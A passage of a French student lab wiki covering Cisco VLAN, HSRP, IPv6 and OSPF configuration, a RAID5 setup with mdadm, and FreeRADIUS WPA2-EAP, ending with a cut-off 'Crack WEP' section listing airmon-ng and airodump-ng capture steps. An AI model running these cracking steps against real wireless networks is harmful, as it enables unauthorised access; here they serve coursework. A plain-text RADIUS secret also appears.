&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
